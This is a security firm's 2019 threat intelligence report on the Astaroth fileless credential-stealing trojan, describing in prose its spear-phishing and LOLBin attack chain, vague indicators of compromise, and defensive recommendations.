Threat Intelligence Report- MS “Great Duke of Hell”

Date: 09th August 2019

Summary

Since its inception in 2017, the trojan malware more commonly known as ‘Astaroth – the Great Duke of Hell’ has been stealing data through specifically targeted spear phishing attacks.

Brought to the world’s attention by the Microsoft Defender Advanced Threat Protection Team, this is a credential stealing malware that is comparatively more destructive than its peers due to its ability to run only legitimate files within the ‘attack chain’ in plain view and without installing software on the target’s machine.

Conclusions

This is unlikely the last we will hear of this malicious threat, as it has successfully transformed from its initial form and this type of ‘fileless’ threat has regularly appeared in the top 10 malware and top 10 network attack lists.

The urgency and seriousness of this malware has been highlighted by two of the main researchers familiar with it –

Andrea Lelli (Researcher) – Microsoft Defender ATP Research Team

“As is known to all, these fileless attacks are able to run the malicious payloads directly in memory or leverage legitimate system tools to run malicious code without having to drop executable files on the disk.”

Eli Salem (Security Researcher) – Cyberreason

“These attacks are considered challenging to detect as the full process of the deployment and execution of the malware is by way of those Windows LOLBins.  To an average person, this activity can seem like a legitimate Windows activity because it’s being executed by Windows processes.”

Tactics, Techniques and Procedures

Essentially, ‘Astaroth’ steals sensitive data (through keylogging and clipboard monitoring), removes it and sends it to a remote attacker. The newly acquired information is then used for further nefarious activities such as selling the data on the dark web or being involved in monetary theft.

The attack is initially instigated after a spear phishing email is opened.  This results in an obfuscated batch file being run and through the manipulation of land binaries (LOLbins) it appears like a normal operation. The LOLbin in this instance is the Windows Management Instrumentation Command-line (WMIC) and when invoked, downloads and runs (yet another obfuscated file, this time in) JavaScipt code.  The role of the JavaScript is now to run two DLL files which log and upload the target’s information while posing as a genuine system process.  The next step in the ’attack chain’ is the Background Intelligent Transfer Services (BITS) admin service which proceeds to download more payloads of the virus.

Conventional signature-based detection tools are most vulnerable as only DLL files are downloaded/installed.  With so few files available, there is limited opportunity to be aware of this attack, let alone be able to scan and then cease the attack.  Essentially. ‘Astaroth’ has been able to flourish without having to resort to traditional malware and trojan exploits.

General anti-virus software would only be able to detect an attack after the DLL files were downloaded.  However, in this scenario, the DLLs files use ‘code obfuscation’ and more damagingly the capability to transform easily and quickly, make them even more difficult to detect.

Indicators of Compromise (IOCs)

  • Large number of requests for the WMIC
  • Increases in Database Read Volume

Vulnerable systems

All Windows Users.

Advice

Invinsec recommend the following actions:

  • Use heuristic detection tools. The main example here is Anti-Virus applications which should be configured to closely monitor the use of the (WMI) command line, thereby allowing users to access management information in an enterprise environment.
  • The AV must also be vigilant when loading DLL files, by applying more stringent rules such as checking the age of files, doing memory scanning, stack trace analysis when programs are executing and blocking recently created DLLs from running
  • Use Multi Factor Authentication to reduce the risk posed by stolen credentials

Leave a Reply